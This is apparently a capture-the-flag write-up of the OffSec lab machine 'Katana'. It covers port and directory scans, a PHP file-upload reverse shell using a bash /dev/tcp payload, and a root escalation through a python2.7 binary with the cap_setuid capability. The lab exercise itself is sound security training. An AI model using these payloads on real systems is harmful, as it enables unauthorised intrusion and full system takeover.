OffSec PG - Katana


Machine IP →

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt

OS Detection → OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
21FTPvsftpd 3.0.3
22SSHOpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80HTTPApache httpd 2.4.38 ((Debian))
7080HTTPSLitespeed httpd
8088HTTPLitespeed httpd
8715HTTPnginx 1.14.2

Therefore, a bunch of ports are open for http → 80, 7080, 8088, 8715, ftp on port 21 and ssh on port 22.

Web Scan

GoBuster scan → gobuster dir -u -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

The result for the port 7080 revealed nothing. The scan for port 80 resulted in the following finds →

  • ebook/ (301)
  • server-status (403)

Directories/files listed for port 8088 →

  • index.html
  • cgi-bin/ (301)
  • img/ (301)
  • docs/ (301)
  • upload.html
  • upload.php
  • css/ (301)
  • protected/ (301)
  • blocked/ (301)
  • phpinfo.php

The scan for the port 8715 revealed nothing.


Looking at the status codes 200 for the enumeration of port 8088, there are two files upload.html and upload.php. These are connected and are an upload capability. Uploading a file on the port 8088 website allows for the file to be accessed on a different web server. This web server is that running on port 8715. However, after testing txt and php files, php files are accessible while txt files need a password. Therefore, a php file can be used to create a reverse shell. Used the following php payload for the reverse shell →

    exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'");

A good resource for a reverse shell is Pentest Monkey PHP reverse shell.

Privilege Escalation

The reverse shell, therefore is the www-data user on the machine. This gives the user flag. Checked sudo capabilities for the user, but there were none. Search for setuid binaries did not give any results as well.

The next checks are to be made for capabilities. Used getcap -r / 2>/dev/null to list files with capabilities set. The result includes the entry → /usr/bin/python2.7 = cap_setuid+ep.

Therefore, the following python code can be invoked using the said binary to elevate privileges → /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'. This gives the root flag.

This post is licensed under CC BY 4.0 by the author.